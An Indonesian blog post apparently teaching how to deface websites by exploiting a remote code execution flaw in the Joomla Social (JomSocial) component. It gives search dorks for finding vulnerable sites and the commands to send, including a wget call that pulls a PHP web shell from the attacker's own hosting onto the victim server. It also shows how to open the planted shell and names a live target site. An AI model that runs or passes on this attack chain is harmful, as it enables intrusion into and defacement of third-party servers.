Deface dengan Joomla Social Remote Code Excution

By
,
1 comment

Yooo sekarang ane Share salah satu tehnik Deface yaitu dengan Joola Social Component alias JomSoc, berhubung ane ga pinter cincong  :v langsung aja ke TKP.

Bahan yg dibutuh kan:
• Dork:
=> inurl:/components/com_community/ site:
=> inurl:index.php?option=com_community site:
• Jomla social component nya disini aja download nya.
• Site ente yg udah ketanem Shell satu berekstensi 'php' yg satu nya berekstensi 'txt' hostingan juga boleh daftar disini dulu.
• Sama site target pastinya kalo ga ada site target mau ngapain :v

Langsung aja kalo udah di download Joomla social component nya instal aja langsung, nanti penampakanya seperti ini.
 Tuh kolom site di diisi sama site target kita.
 kalo udah ketemu langsung aja klik "Connect".
 Tuh kalo site nya Vuln ada tulisan "Connected Sucssesfuly".
 Lanjut masukkan Command pertama di kotak bawah site itu Command pertama: print_r($_SERVER); lalu klik "Send Command"
 Liat tuh penampakanya.
 kalo udah masukkan Command ke dua yaitu system ('id & uname-a'); kalo udah klik "Send Command".
 Liat lagi tuh penampakannya kang.
Lanjut Command ketiga, di Command ketiga ini ente harus punya site ato ga hostingan yg udah ketanem Shell yg 1 berekstensi "php" yg 1 ber ekstensi "txt"
 Contoh:
• hostinganente.com/Shell.php
• hostinganente.com/Shell.txt
Jadi Command ke tiga ini masukkan seperti ini: system ('wget http://www.hostinganente.com/Shell.txt -O namashell.php'); di Command "namaShell" itu terserah ente, disini ane Shellnya ane namain Ente.php Jadi ane Command nya: system ('wget http://www.hostinganente.com/Shell.txt -O Ente.php'); lanjut kalo udah "Send Command"
 Liat lagi tuh penampakanya.
 Nih kalo udah masukkan Command terakhir yaitu: system ('ls'); trus klik "Send Command".
 klik Disconnect terus liat tuh Shell nya ada kang "Ente.php" :v
Sekarang Copy tuh site target tadi ke Browser ente di akhir url nya tambahin nama shell ente tadi, Contoh: sitetarget.com/namashelltadi.php , karna tadi Shell nya ane namain "Ente.php" jadi ane akses nya gini sitetarget.com/Ente.php
Weeww sekarang tuh udah masuk ke dalem Shell nya, terserah deh mau di apain, index nya jangan di tebas ya tapi di rename aja, hargai karya Orang kang :v

Sekian yah Tutor nya kalo ga ngerti Comment di bawah :D
Mau Copas artikel nya ? Sertakan sumbernya jadilah orang yg Bijakkk.
Live Target: http://www.antykwariat-merkuriusz.pl/

Nanti ane Post lagi kalo nemu Live target :v

1 comment:

  1. Anemon450April 23, 2018 at 6:47 AM

    Bang mau nanya,
    Itu shell.php yg di hosting kita guna nya untuk apa ?

    ReplyDelete